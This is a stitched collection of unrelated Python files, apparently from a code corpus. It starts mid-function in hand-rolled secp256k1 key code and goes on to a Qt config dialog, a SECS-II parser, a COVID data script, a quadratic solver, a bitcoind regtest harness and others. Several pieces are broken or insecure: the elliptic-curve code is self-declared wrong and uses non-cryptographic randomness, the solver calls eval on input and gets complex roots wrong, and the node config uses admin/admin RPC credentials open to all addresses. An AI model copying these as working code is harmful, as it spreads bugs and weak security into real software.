if m >= secp_n or m < 0:
raise Exception("Input parameter 1 outside the accepted range!")
if B[0] >= secp_n or B[0] < 0 or B[1] < 0 or B[1] >= secp_n:
raise Exception("Input parameter 2 outside the accepted range!")
m_bin_array = bin_array(m)
double_point = B
point_sum = secp_inf_point
for i in range(len(m_bin_array)):
if m_bin_array[len(m_bin_array)-i-1]==1:
point_sum = libsecp().point_add(double_point, point_sum)
double_point = libsecp().point_add(double_point,double_point) # This is not quite right!!
return point_sum
def key_store(num_keys):
for i in range(num_keys):
privkey = libsecp().private_key()
pubkey = libsecp().public_key(privkey)
wallet_key = libsecp().wif(privkey)
compressedkey = libsecp256k1().compress_key(pubkey)
store.append([wallet_key, pubkey, compressedkey])
return store
def symmetric_key():
return random.randint(1, sym_key_n)
|
names = []
with open("0022.txt") as file:
for line in file:
names_in_line = map(lambda s: s[1:-1], line.split(","))
names.extend(names_in_line)
names.sort()
def name_score(name, index):
score = 0
for char in name:
score += ord(char) - 64
score *= index
return score
total_name_score = 0
for index, name in enumerate(names):
total_name_score += name_score(name, index + 1)
print(total_name_score)
|
'''
Created on Jan 22, 2019
@author: sven
'''
from configparser import ConfigParser
from pathlib import Path
from PySide2.QtGui import QIntValidator
from PySide2.QtWidgets import QDialog, QApplication
from PySide2 import QtCore
from ui.configDialog import Ui_Dialog
class EcManConfigDialog(QDialog):
'''
QDialog based Configuration dialog for ECMan app
adapted from https://www.codementor.io/deepaksingh04/design-simple-dialog-using-pyqt5-designer-tool-ajskrd09n
and https://stackoverflow.com/questions/19379120/how-to-read-a-config-file-using-python#19379306
class inherists from QDialog, and contains the UI defined in ConfigDialog (based on configDialog.ui)
'''
def __init__(self, parent=None, configFile=""):
'''
Constructor
'''
super(EcManConfigDialog, self).__init__(parent)
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.setWindowTitle("ECMan - Konfiguration")
self.ui.lineEdit_MaxFiles.setValidator(QIntValidator(10, 10000, self))
self.ui.lineEdit_MaxFileSize.setValidator(QIntValidator(10, 1000, self))
self.ui.comboBox_LbServer.addItem("")
self.ui.comboBox_LbServer.addItem("//NSSGSC01/LBV")
self.ui.comboBox_LbServer.addItem("//NSZHSC02/LBV")
self.ui.comboBox_LbServer.addItem("//NSBESC02/LBV")
self.config = ConfigParser()
self.configFile = configFile
if self.configFile == "":
self.configFile = Path(str(Path.home()) + "/.ecman.conf")
else:
self.configFile = Path(configFile)
if self.configFile.exists():
self.config.read_file(open(str(self.configFile)))
self.ui.comboBox_LbServer.setCurrentText(self.config.get("General", "lb_server", fallback=""))
self.ui.lineEdit_StdLogin.setText(self.config.get("Client", "lb_user", fallback="student"))
self.ui.lineEdit_winRmPort.setText(self.config.get("General", "winrm_port", fallback="5986"))
self.ui.lineEdit_OnlineWiki.setText(
self.config.get("General", "wikiurl", fallback="https://github.com/greenorca/ECMan/wiki"))
self.ui.lineEdit_winRmUser.setText(self.config.get("Client", "user", fallback="winrm"))
self.ui.lineEdit_winRmPwd.setText(self.config.get("Client", "pwd", fallback=""))
self.ui.lineEdit_MaxFiles.setText(self.config.get("Client", "max_files", fallback="1000"))
filesize = self.config.get("Client", "max_filesize", fallback="1000")
try:
filesize = int(filesize)
except Exception as ex:
filesize = 42
self.ui.lineEdit_MaxFileSize.setText(str(filesize))
self.ui.checkBox_advancedFeatures.setChecked(self.config.get("General","advanced_ui", fallback="False") == "True")
def saveConfig(self):
'''
saves entered configuration items
TODO: make bulletproof
'''
if not (self.configFile.exists()):
self.configFile.touch()
self.config.read_file(open(str(self.configFile)))
if not (self.config.has_section("General")):
self.config.add_section("General")
self.config["General"]["winrm_port"] = self.ui.lineEdit_winRmPort.text()
self.config["General"]["lb_server"] = self.ui.comboBox_LbServer.currentText()
onlineUrl = self.ui.lineEdit_OnlineWiki.text()
if not (onlineUrl.startswith("http://") or onlineUrl.startswith("https://")):
onlineUrl = "http://" + onlineUrl
self.config["General"]["wikiurl"] = onlineUrl
if not (self.config.has_section("Client")):
self.config.add_section("Client")
self.config["Client"]["lb_user"] = self.ui.lineEdit_StdLogin.text()
self.config["Client"]["user"] = self.ui.lineEdit_winRmUser.text()
self.config["Client"]["pwd"] = self.ui.lineEdit_winRmPwd.text()
maxfiles = self.ui.lineEdit_MaxFiles.text()
try:
maxfiles = int(maxfiles)
except Exception as ex:
maxfiles = 42
self.config["Client"]["max_files"] = str(maxfiles)
filesize = self.ui.lineEdit_MaxFileSize.text()
try:
filesize = int(filesize)
except:
filesize = 42
self.config["Client"]["max_filesize"] = str(filesize)
advancedUi = self.ui.checkBox_advancedFeatures.checkState() == QtCore.Qt.CheckState.Checked
self.config["General"]["advanced_ui"] = str(advancedUi)
self.config.write(open(self.configFile, 'w'))
if __name__ == "__main__":
'''
just for testing
'''
app = QApplication()
dlg = EcManConfigDialog(None, "dummy.conf")
result = dlg.exec_()
if result == 1:
dlg.saveConfig()
|
from .provider_base import *
from .motivato import *
|
# MIT License
# Copyright (c) 2017 MassChallenge, Inc.
from django.conf import settings
import swapper
from django.db.models import (
CASCADE,
ForeignKey,
)
from .accelerator_model import AcceleratorModel
class BasePartnerJudgeApplicationAssignment(AcceleratorModel):
judge = ForeignKey(settings.AUTH_USER_MODEL,
on_delete=CASCADE)
application = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "Application"),
on_delete=CASCADE)
judging_round = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "JudgingRound"),
on_delete=CASCADE)
partner = ForeignKey(
to=swapper.get_model_name(
AcceleratorModel.Meta.app_label, "Partner"),
on_delete=CASCADE)
class Meta(AcceleratorModel.Meta):
db_table = 'accelerator_partnerjudgeapplicationassignment'
abstract = True
|
import os
import struct
class Secs2BodyParseError(Exception):
pass
class Secs2BodySmlParseError(Secs2BodyParseError):
pass
class Secs2BodyBytesParseError(Secs2BodyParseError):
pass
class Secs2Body:
_ITEMS = (
('L', 0x00, -1, None),
('B', 0x20, 1, 'c'),
('BOOLEAN', 0x24, 1, '?'),
('A', 0x40, -1, None),
('I8', 0x60, 8, 'q'),
('I1', 0x64, 1, 'b'),
('I2', 0x68, 2, 'h'),
('I4', 0x70, 4, 'l'),
('F8', 0x80, 8, 'd'),
('F4', 0x90, 4, 'f'),
('U8', 0xA0, 8, 'Q'),
('U1', 0xA4, 1, 'B'),
('U2', 0xA8, 2, 'H'),
('U4', 0xB0, 4, 'L')
)
_BYTES_LEN_3 = 2**16
_BYTES_LEN_2 = 2**8
_SML_TAB = ' '
_SML_VALUESEPARATOR = ' '
_SML_LINESEPARATOR = os.linesep
def __init__(self, item_type, value):
if item_type is None:
raise TypeError("Not accept None")
tt = type(item_type)
if tt is str:
self._type = self._get_item_type_from_sml(item_type)
elif tt is tuple:
self._type = item_type
else:
raise TypeError("Require str or tuple")
def _tiof(value, item_size, is_signed): # test_int_overflow return int_value
if type(value) is str and value.upper().startswith("0X"):
v = int(value[2:], 16)
else:
v = int(value)
n = item_size * 8
if is_signed:
n -= 1
x = 2**n
max = x-1
if is_signed:
min = -x
else:
min = 0
if v > max or v < min:
raise ValueError("value is from " + str(min) + " to " + str(max) + ", value is " + str(v))
return v
tv = type(value)
if self._type[0] == 'L':
if tv is tuple or tv is list:
vv = list()
for x in value:
tx = type(x)
if tx is Secs2Body:
vv.append(x)
elif (tx is tuple or tx is list) and (len(x) == 2):
vv.append(Secs2Body(x[0], x[1]))
else:
raise TypeError("L value require tuple or list, and length == 2")
self._value = tuple(vv)
else:
raise TypeError("L values require tuple or list")
elif self._type[0] == 'BOOLEAN':
if tv is tuple or tv is list:
self._value = tuple([bool(x) for x in value])
else:
self._value = tuple([bool(value)])
elif self._type[0] == 'A':
self._value = str(value)
elif self._type[0] == 'B':
if tv is bytes:
self._value = value
elif tv is bytearray:
self._value = bytes(value)
elif tv is tuple or tv is list:
self._value = bytes([(_tiof(x, self._type[2], False)) for x in value])
else:
self._value = bytes([_tiof(value, self._type[2], False)])
elif self._type[0] in ('U1', 'U2', 'U4', 'U8'):
if tv is tuple or tv is list:
self._value = tuple([(_tiof(x, self._type[2], False)) for x in value])
else:
self._value = tuple([_tiof(value, self._type[2], False)])
elif self._type[0] in ('I1', 'I2', 'I4', 'I8'):
if tv is tuple or tv is list:
self._value = tuple([(_tiof(x, self._type[2], True)) for x in value])
else:
self._value = tuple((_tiof(value, self._type[2], True), ))
elif self._type[0] in ('F4', 'F8'):
if tv is tuple or tv is list:
self._value = tuple([float(x) for x in value])
else:
self._value = tuple((float(value), ))
self._cache_sml = None
self._cache_repr = None
self._cache_bytes = None
def __str__(self):
return self.to_sml()
def __repr__(self):
if self._cache_repr is None:
self._cache_repr = str((self._type[0], self._value))
return self._cache_repr
def __len__(self):
return len(self._value)
def __getitem__(self, item):
return self._value[item]
def __iter__(self):
return iter(self._value)
def __next__(self):
return next(self._value)
def get_type(self):
return self._type[0]
def to_sml(self):
def _ss(item_type, length, value): # create_sml_string
return '<' + item_type + ' [' + str(length) + '] ' + value + ' >'
def _lsf(value, level=''): # create_list_sml_string
deep_level = level + self._SML_TAB
vv = list()
vv.append(level + '<L [' + str(len(value)) + ']')
for x in value:
if x._type[0] == 'L':
vv.append(_lsf(x._value, deep_level))
else:
vv.append(deep_level + x.to_sml())
vv.append(level + '>')
return self._SML_LINESEPARATOR.join(vv)
if self._cache_sml is None:
if self._type[0] == 'L':
self._cache_sml = _lsf(self._value)
elif self._type[0] == 'BOOLEAN':
vv = [("TRUE" if x else "FALSE") for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
elif self._type[0] == 'A':
self._cache_sml = _ss(
self._type[0],
len(self._value),
'"' + self._value + '"')
elif self._type[0] == 'B':
vv = [('0x' + '{:02X}'.format(x)) for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
elif self._type[0] in ('I1', 'I2', 'I4', 'I8', 'U1', 'U2', 'U4', 'U8', 'F4', 'F8'):
vv = [str(x) for x in self._value]
self._cache_sml = _ss(
self._type[0],
len(vv),
self._SML_VALUESEPARATOR.join(vv))
return self._cache_sml
def to_bytes(self):
def _ihb(item_type_byte, value_length): # create_item_header_bytes
bs = struct.pack('>L', value_length)
if value_length >= self._BYTES_LEN_3:
return struct.pack('>B', (item_type_byte | 0x03)) + bs[1:4]
elif value_length >= self._BYTES_LEN_2:
return struct.pack('>B', (item_type_byte | 0x02)) + bs[2:4]
else:
return struct.pack('>B', (item_type_byte | 0x01)) + bs[3:4]
if self._cache_bytes is None:
if self._type[0] == 'L':
vv = [x.to_bytes() for x in self._value]
self._cache_bytes = _ihb(self._type[1], len(self._value)) + b''.join(vv)
elif self._type[0] == 'BOOLEAN':
vv = [(0xFF if f else 0x00) for f in self._value]
self._cache_bytes = _ihb(self._type[1], len(vv)) + bytes(vv)
elif self._type[0] == 'A':
bs = self._value.encode(encoding='ascii')
self._cache_bytes = _ihb(self._type[1], len(bs)) + bs
elif self._type[0] == 'B':
self._cache_bytes = _ihb(self._type[1], len(self._value)) + self._value
elif self._type[0] in ('I1', 'I2', 'I4', 'I8', 'F8', 'F4', 'U1', 'U2', 'U4', 'U8'):
bs = b''.join([struct.pack(('>' + self._type[3]), x) for x in self._value])
self._cache_bytes = _ihb(self._type[1], len(bs)) + bs
return self._cache_bytes
@classmethod
def _get_item_type_from_sml(cls, sml_item_type):
str_upper = sml_item_type.upper()
for i in cls._ITEMS:
if i[0] == str_upper:
return i
raise ValueError("'" + sml_item_type + "' not found")
@classmethod
def from_body_sml(cls, sml_str):
def _is_ws(v): # is_white_space
return (v.encode(encoding='ascii'))[0] <= 0x20
def _seek_next(s, from_pos, *args):
p = from_pos
if len(args) > 0:
while True:
v = s[p]
for a in args:
if type(a) is str:
if v == a:
return (v, p)
else:
if a(v):
return (v, p)
p += 1
else:
while True:
v = s[p]
if _is_ws(v):
p += 1
else:
return (v, p)
def _ssbkt(s, from_pos): # seek size_start_blacket'[' position, return position, -1 if not exist
v, p = _seek_next(s, from_pos)
return p if v == '[' else -1
def _sebkt(s, from_pos): # seek size_end_blacket']' position, return position
return (_seek_next(s, from_pos, ']'))[1]
def _isbkt(s, from_pos): # seek item_start_blacket'<' position, return position, -1 if not exist
v, p = _seek_next(s, from_pos)
return p if v == '<' else -1
def _iebkt(s, from_pos): # seek item_end_blacket'>' position, return position
return (_seek_next(s, from_pos, '>'))[1]
def _seek_item(s, from_pos): # seek item_type, return (item_type, shifted_position)
p_start = (_seek_next(s, from_pos))[1]
p_end = (_seek_next(s, (p_start + 1), '[', '"', '<', '>', _is_ws))[1]
return (cls._get_item_type_from_sml(s[p_start:p_end]), p_end)
def _f(s, from_pos):
p = _isbkt(s, from_pos)
if p < 0:
raise Secs2BodySmlParseError("Not start < bracket")
tt, p = _seek_item(s, (p + 1))
r = _ssbkt(s, p)
if r >= 0:
p = _sebkt(s, (r + 1)) + 1
if tt[0] == 'L':
vv = list()
while True:
v, p = _seek_next(s, p)
if v == '>':
return (Secs2Body(tt, vv), (p + 1))
elif v == '<':
r, p = _f(s, p)
vv.append(r)
else:
raise Secs2BodySmlParseError("Not reach LIST end")
elif tt[0] == 'BOOLEAN':
r = _iebkt(s, p)
vv = list()
for x in s[p:r].strip().split():
ux = x.upper()
if ux == 'TRUE' or ux == 'T':
vv.append(True)
elif ux == 'FALSE' or ux == 'F':
vv.append(False)
else:
raise Secs2BodySmlParseError("Not accept, BOOELAN require TRUE or FALSE")
return (Secs2Body(tt, vv), (r + 1))
elif tt[0] == 'A':
vv = list()
while True:
v, p_start = _seek_next(s, p)
if v == '>':
return (Secs2Body(tt, ''.join(vv)), (p_start + 1))
elif v == '"':
v, p_end = _seek_next(s, (p_start + 1), '"')
vv.append(s[(p_start+1):p_end])
p = p_end + 1
elif v == '0':
if s[p_start + 1] not in ('X', 'x'):
raise Secs2BodyParseError("Ascii not accept 0xNN")
v, p = _seek_next(s, (p_start+2), '"', '>', _is_ws)
vv.append(bytes([int(s[(p_start+2):p], 16)]).decode(encoding='ascii'))
else:
raise Secs2BodySmlParseError("Ascii not reach end")
elif tt[0] in ('B', 'I1', 'I2', 'I4', 'I8', 'F4', 'F8', 'U1', 'U2', 'U4', 'U8'):
r = _iebkt(s, p)
return (Secs2Body(tt, s[p:r].strip().split()), (r + 1))
try:
if sml_str is None:
raise Secs2BodySmlParseError("Not accept None")
ss = str(sml_str).strip()
r, p = _f(ss, 0)
if len(ss[p:]) > 0:
raise Secs2BodySmlParseError("Not reach end, end=" + str(p) + ", length=" + str(len(ss)))
return r
except TypeError as e:
raise Secs2BodySmlParseError(str(e))
except ValueError as e:
raise Secs2BodySmlParseError(str(e))
except IndexError as e:
raise Secs2BodySmlParseError(str(e))
@classmethod
def from_body_bytes(cls, body_bytes):
def _itr(b): # get_item_type
x = b & 0xFC
for i in cls._ITEMS:
if i[1] == x:
return i
raise ValueError('0x' + '{:02X}'.format(b) + " not found")
def _xr(bs, pos): # get (item_type, value_length, shift_position)
b = bs[pos]
t = _itr(b)
len_bit = b & 0x3
if len_bit == 3:
len = (bs[pos+1] << 16) | (bs[pos+2] << 8) | bs[pos+3]
elif len_bit == 2:
len = (bs[pos+1] << 8) | bs[pos+2]
else:
len = bs[pos+1]
return (t, len, (len_bit + 1))
def _f(bs, pos):
r = _xr(bs, pos)
tt, v_len, b_len = _xr(bs, pos)
start_index = pos + b_len
end_index = pos + b_len + v_len
if tt[0] == 'L':
vv = list()
p = start_index
for _ in range(r[1]):
v, p = _f(bs, p)
vv.append(v)
return (Secs2Body(tt, vv), p)
elif tt[0] == 'BOOLEAN':
vv = [(b != 0x00) for b in bs[start_index:end_index]]
return (Secs2Body(tt, vv), end_index)
elif tt[0] == 'A':
v = bs[start_index:end_index].decode(encoding='ascii')
return (Secs2Body(tt, v), end_index)
elif tt[0] == 'B':
vv = bs[start_index:end_index]
return (Secs2Body(tt, vv), end_index)
elif tt[0] in ('I1', 'I2', 'I4', 'I8', 'F8', 'F4', 'U1', 'U2', 'U4', 'U8'):
vv = list()
p = start_index
for _ in range(0, v_len, tt[2]):
prev = p
p += tt[2]
v = struct.unpack(('>' + tt[3]), bs[prev:p])
vv.append(v[0])
return (Secs2Body(tt, vv), end_index)
try:
r, p = _f(body_bytes, 0)
length = len(body_bytes)
if p == length:
r._cache_bytes = bytes(body_bytes)
return r
else:
raise Secs2BodyBytesParseError("not reach bytes end, reach=" + str(p) + ", length=" + str(length))
except ValueError as e:
raise Secs2BodyBytesParseError(str(e))
except TypeError as e:
raise Secs2BodyBytesParseError(str(e))
except IndexError as e:
raise Secs2BodyBytesParseError(str(e))
if __name__ == '__main__':
print('')
print("try-python")
# s = Secs2Body({"aaa":111})
vv = tuple([
# Secs2Body('A', 'ASCII-VALUE'),
# Secs2Body('B', 1),
# Secs2Body('B', (0x01, 0x10, 0xAA, 0xFF)),
# Secs2Body('BOOLEAN', True),
# Secs2Body('BOOLEAN', (True, False, True)),
# Secs2Body('I1', 100),
# Secs2Body('I1', (100, -120)),
# Secs2Body('U4', 2000),
# Secs2Body('U2', (2000, 3000)),
# Secs2Body('F4', 10.0),
# Secs2Body('F4', (10.0, 20.0, -30.0)),
Secs2Body('L', (
('B', (0xFF, 0x01)),
('B', []),
('A', 'CCC_DDD'),
('I2', [100, -200, -300]),
('U4', [100, 200, 300]),
('L', [
('BOOLEAN', True),
('U4', 12345)
]),
('L', [])
))
])
# for v in vv:
# print(v)
# print(repr(v))
# a = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# v = Secs2Body('A', a+a+a+a+a+a+a+a+a+a)
# v = Secs2Body('B', [0x00, 0xFF, 0x1, 0x2])
# v = Secs2Body('BOOLEAN', (True, False))
# v = Secs2Body('U2', (1, 2, 3))
# v = Secs2Body('I2', (-1, 2, -3))
# v = Secs2Body('F8', (10.0, 20.0))
v = Secs2Body('L', [
('L', [
('B', [0x01, 0xFF]),
('BOOLEAN', [True, False]),
('L', [])
]),
('B', [0x01, 0x10]),
('A', "ABCDEF"),
('U2', [1,2,3]),
('I2', [-100,200,-300]),
('F4', [19.00, -29.00])
])
bs = v.to_bytes()
print(bs)
r = Secs2Body.from_body_bytes(bs)
print(r)
x = Secs2Body.from_body_sml(r.to_sml())
print(x)
print(x.to_bytes())
# print('length: ' + str(len(x)))
# for a in x:
# print(a.get_type() + ': ' + str(a._value))
# for b in a:
# print(b)
# print(x[0][1][1])
# v = Secs2Body.from_body_sml('<A [10] "XYZ123" 0x61 0x20 "ABC">')
# v = Secs2Body.from_body_sml('<BOOLEAN[2] TRUE FALSE>')
# v = Secs2Body.from_body_sml('<B 0x0A 0x02>')
# v = Secs2Body.from_body_sml('<U2 100 200>')
# v = Secs2Body.from_body_sml('<L <A "AAA" 0x42\t0x43"124" ><L <I1 1><I2 100>><B 0x0><BOOLEAN TRUE><F4 -10.0>>')
# print(v)
# try:
# bs = v.to_bytes()
# print(bs)
# r = Secs2Body.from_body_bytes(bs)
# print(r)
# except Secs2BodyParseError as e:
# print("Secs2BodyParserError: " + str(e))
|
import os
import re
import pygame as p
class AssetLoader():
"""
Scan asset folders and import images
"""
ASSETSPATH = './Assets/'
PNGEXT = '.png'
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(AssetLoader, cls).__new__(cls)
if os.path.exists(AssetLoader.ASSETSPATH):
cls._instance.files = os.listdir(AssetLoader.ASSETSPATH)
else:
raise OSError('unable to find ' + AssetLoader.ASSETSPATH)
return cls._instance
def __load_sprites(self, file_filter):
player_sprites = []
regex = re.compile(file_filter)
filtered_files = list(filter(regex.search, self.files))
if len(filtered_files) > 1:
number_regex = re.compile(r'(\d+)')
filtered_files = sorted(
filtered_files,
key=lambda x: int(number_regex.search(x)[0])
)
for file in filtered_files:
file_relpath = self.ASSETSPATH + file
try:
player_sprites.append(p.image.load(file_relpath))
except p.error as message:
print('cannot load image:', file_relpath)
raise SystemExit(message)
return player_sprites
def load_walk_left_sprites(self):
return self.__load_sprites('L[0-9].png')
def load_walk_right_sprites(self):
return self.__load_sprites('R[0-9].png')
def load_background(self):
return self.__load_sprites('bg.jpg').pop()
def load_character(self):
return self.__load_sprites('standing.png')
def load_enemy_walk_left_sprites(self):
return self.__load_sprites('L[0-9]{1,2}E.png')
def load_enemy_walk_right_sprites(self):
return self.__load_sprites('R[0-9]{1,2}E.png')
def load_bullet_sound(self):
return p.mixer.Sound(self.ASSETSPATH + 'bullet.mp3')
def load_hit_sound(self):
return p.mixer.Sound(self.ASSETSPATH + 'hit.mp3')
def load_music(self):
return p.mixer.Sound(self.ASSETSPATH + 'music.mp3')
|
import os.path
from . import *
class TestFilesWithSpaces(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__('files_with_spaces', *args, **kwargs)
def test_build(self):
self.build(executable('quad damage'))
self.assertOutput([executable('quad damage')], 'QUAD DAMAGE!\n')
def test_build_sub_dir(self):
self.build(executable('another file'))
self.assertOutput([executable('another file')], 'hello from sub dir\n')
@only_if_backend('make', hide=True)
def test_dir_sentinels(self):
self.build(executable('another file'))
self.assertTrue(os.path.isfile('another file.int/sub dir/.dir'))
@skip_if_backend('msbuild')
def test_script(self):
self.assertRegex(self.build('script'), '(?m)^hello, world!$')
|
import json
from werkzeug.datastructures import FileStorage
from esdlvalidator.core.esdl import utils
from esdlvalidator.core.exceptions import UnknownESDLFileType
from esdlvalidator.validation.abstract_repository import SchemaRepository
from esdlvalidator.validation.validator import Validator
class ValidationService:
"""Service for handling all requests to the validation endpoint"""
def __init__(self, schemaRepository: SchemaRepository):
self.__repo = schemaRepository
self.__validator = Validator()
self.esdl = None
def validate(self, file: FileStorage, schemaIds: list, validateXsd: bool):
"""Validate an uploaded file against the given schemas
Args:
file (FileStorage): Uploaded file
schemaIds: List of schema id's to validate against. example [1,2]
Returns:
result: JSON result of the validation
Raises:
SchemaNotFound: One of the validation schemas was not found
UnknownESDLFileType: Type of uploaded file is not supported
InvalidESDL: ESDL could not be loaded by the system
"""
if not self.__allowed_file(file.filename):
raise UnknownESDLFileType
schemas = self.__repo.get_by_ids(schemaIds)
esdlString = self.__get_esdl_string(file)
result = self.__validator.validate(esdlString, schemas, validateXsd)
# ToDo: fix need for toJSON and then back
jsonString = result.toJSON()
return json.loads(jsonString)
def validateContents(self, esdlContents: str, schemaIds: list, validateXsd: bool):
"""Validate an uploaded file contents against the given schemas
Args:
esdlContents (String): Uploaded file contents
schemaIds: List of schema id's to validate against. example [1,2]
Returns:
result: JSON result of the validation
Raises:
SchemaNotFound: One of the validation schemas was not found
UnknownESDLFileType: Type of uploaded file is not supported
"""
schemas = self.__repo.get_by_ids(schemaIds)
result = self.__validator.validate(esdlContents, schemas, validateXsd)
# ToDo: fix need for toJSON and then back
jsonString = result.toJSON()
return json.loads(jsonString)
def __allowed_file(self, filename):
"""Allowed esdl file extensions"""
return "." in filename and \
filename.rsplit(".", 1)[1].lower() in ["esdl", "xml"]
def __get_esdl_string(self, file):
"""Get a string from the uploaded file"""
fileBytes = file.read()
esdlString = fileBytes.decode("utf-8")
return esdlString
|
import pandas as pd
abbreviations = ['DE', 'DE-BW', 'DE-BY', 'DE-HB', 'DE-HH', 'DE-HE',
'DE-NI', 'DE-NW', 'DE-RP', 'DE-SL', 'DE-SH', 'DE-BB',
'DE-MV', 'DE-SN', 'DE-ST', 'DE-TH', 'DE-BE']
regions = ['Bundesgebiet', 'Baden-Württemberg', 'Bayern', 'Bremen', 'Hamburg', 'Hessen',
'Niedersachsen', 'Nordrhein-Westfalen', 'Rheinland-Pfalz', 'Saarland', 'Schleswig-Holstein', 'Brandenburg',
'Mecklenburg-Vorpommern', 'Sachsen', 'Sachsen-Anhalt', 'Thüringen', 'Berlin']
# dictionary to map region names to abbreviations
region_dict = dict(zip(regions, abbreviations))
# get current date
date = pd.to_datetime('today').date()
url = "https://raw.githubusercontent.com/robert-koch-institut/COVID-19-Hospitalisierungen_in_Deutschland/master/" \
f"Archiv/{date}_Deutschland_adjustierte-COVID-19-Hospitalisierungen.csv"
# import the csv file as a dataframe
df = pd.read_csv(url, sep=',', parse_dates=["Datum"])
# drop the most recent two dates and dates older than 28 days
df = df[df.Datum.dt.date.between(date - pd.Timedelta(days = 28), date - pd.Timedelta(days = 2), inclusive = 'left')]
# rename locations according to submission guidelines
df.Bundesland.replace(region_dict, inplace = True)
# drop unnecessary columns
df.drop(columns = ["Bundesland_Id","Altersgruppe","Bevoelkerung","fixierte_7T_Hospitalisierung_Faelle",
"aktualisierte_7T_Hospitalisierung_Faelle","fixierte_7T_Hospitalisierung_Inzidenz",
"aktualisierte_7T_Hospitalisierung_Inzidenz","PS_adjustierte_7T_Hospitalisierung_Inzidenz",
"UG_PI_adjustierte_7T_Hospitalisierung_Inzidenz","OG_PI_adjustierte_7T_Hospitalisierung_Inzidenz"],
inplace = True)
df.rename(columns = {'Datum': 'target_end_date', 'Bundesland': 'location'}, inplace = True)
# rearrange in long format
df = pd.melt(df, id_vars = ['target_end_date', 'location'], var_name = 'quantile')
# add column 'quantile'
df['quantile'].replace({'PS_adjustierte_7T_Hospitalisierung_Faelle': '',
'UG_PI_adjustierte_7T_Hospitalisierung_Faelle': '0.025',
'OG_PI_adjustierte_7T_Hospitalisierung_Faelle': '0.975'},
inplace = True)
# add column 'type'
df['type'] = 'quantile'
df.loc[df['quantile'] == '', 'type'] = 'mean'
# add necessary columns
df["age_group"] = "00+"
df["forecast_date"] = date
df["pathogen"] = "COVID-19"
# calculate the values of the "target" column
df["forecast_date"] = pd.to_datetime(df["forecast_date"])
df["target"] = (df['target_end_date'] - df['forecast_date']).dt.days
df["target"] = df["target"].astype(str) + " day ahead inc hosp"
# sort the columns
df = df[["location","age_group", "forecast_date", "target_end_date", "target", "type","quantile", "value", "pathogen"]]
# export to csv
df.to_csv(f"./data-processed/RKI-weekly_report/{date}-RKI-weekly_report.csv", index = False)
|
from math import sqrt
a,b,c=eval(input('please input float a,b,c'))
if a==0:
print('错误,a不能为0')
else:
delta=b**2-4*a*c
if delta>=0:
x1=(-b-sqrt(delta))/(2*a)
x2=(-b+sqrt(delta))/(2*a)
else:
x1=complex((-b)/(2*a),(sqrt(-delta))/2*a)
x2=complex((-b)/(2*a),(sqrt(-delta))/2*a)
print('{:10.5f},{:10.5f}'.format(x1,x2))
|
#-*- coding: utf-8 -*-
from confiture import Confiture, ConfigFileError
import os
from src.py.sym import SymExtractor
from src.py.log import Log, default_log_path, default_log_dir
from src.py.pintool import Pintool
from src.py.res import Result
def launch_analysis(args, analysis=None):
if analysis is None:
analysis = args.analysis
# Read configuration file
tpl = Confiture("config/template.yaml")
config = tpl.check_and_get("config/config.yaml")
# Check if temporary repo exists
if not os.path.exists("tmp"):
os.makedirs("tmp")
# Extract dwarf info
SymExtractor().extract(args.pgm, "tmp/dwarf.txt")
# Create Pintool object
pintool = Pintool(
config["pin"]["path"],
config["pin"]["bin"],
config["pin"]["compile-flags"],
config["pintool"]["src"],
config["pintool"]["obj"],
)
# Log file
if args.log:
logidir = args.log
else:
logdir = default_log_dir(args.pgm)
# Compile pintool
Log.stdout("compiling pintool")
if not pintool.compile(analysis if analysis else args.analysis):
Log.stdout("compilation exited with non-zero status")
exit()
if "oracle" in analysis:
infile = "tmp/dwarf.txt"
else:
infile = None
# Launch pintool
Log.stdout("launching analysis on {}".format(args.pgm))
pintool.launch(args.pgm, args.args, infile, logdir, "-l true" if not args.ignore_libs else None)
# Get results
for an in analysis:
Log.stdout("extracting results")
res = Result(default_log_path(logdir, args.pgm, an))
# Print the results
Log.stdout("results of inference:")
res.display()
|
from pelican import signals
from typographeur import typographeur
def apply_rules_for_articles(articleGenerator):
settings = articleGenerator.settings
for article in articleGenerator.articles:
article._content = typographeur(article._content, fix_semicolon=False)
def apply_rules_for_pages(pageGenerator):
for page in pageGenerator.pages:
page._content = typographeur(page._content, fix_semicolon=False)
def register():
signals.article_generator_finalized.connect(apply_rules_for_articles)
signals.page_generator_finalized.connect(apply_rules_for_pages)
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
class TaskState(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Task(models.Model):
owner = models.ForeignKey(User)
title = models.CharField(max_length=200)
description = models.TextField()
state = models.ForeignKey(TaskState)
create_date = models.DateTimeField(auto_now_add=True)
|
import config
""" Control the custom nodes throughout """
daemon = 'bitcoind '
args = {
'regtest': '-regtest',
'datadir': '-datadir=' + config.bitcoin_data_dir,
# log all events relevant for parsing
'debug': '-debug=cmpctblock -debug=net -debug=mempool', # For mempool
'logtimemicros': '-logtimemicros', # DO NOT CHANGE TO OTHER UNIT
'onlynet': '-onlynet=ipv4',
'dnsseed': '-dnsseed=0', # Set to 0 to avoid fall back to hardcoded one
'reindex': '-reindex', # for correct order of transactions
'checkmempool': '-checkmempool=0', # To have store of mempool
'keypool': '-keypool=1', # Keypool of wallet address
# RPC configuration
'rpcuser': '-rpcuser=admin',
'rpcpassword': '-rpcpassword=admin',
'rpcallowip': '-rpcallowip=1.1.1.1/0.0.0.0',
'rpcservertimeout': '-rpcservertimeout=' + str(config.rpc_timeout),
}
def start(name, ip, path, connect_to_ips):
return_args = args.copy()
cmd = transform_to_cmd(return_args)
for _ip in connect_to_ips:
cmd += ' -connect=' + str(_ip)
def exec_cmd(node, cmd):
return './btcd {}{} {}'.format(config.prefix, node, cmd)
def transform_to_cmd(args_to_transform):
return daemon + ' '.join(args_to_transform.values())
def rm_peers(node):
return exec_cmd(node, 'rm -f {}/regtest/peers.dat'.format(config.bitcoin_data_dir))
def check_if_running(name):
return 'test -t 0 {{{{.State.Running}}}} {0}{1}'.format(config.prefix, name)
|
import os
CACHE_DIR = 'cache'
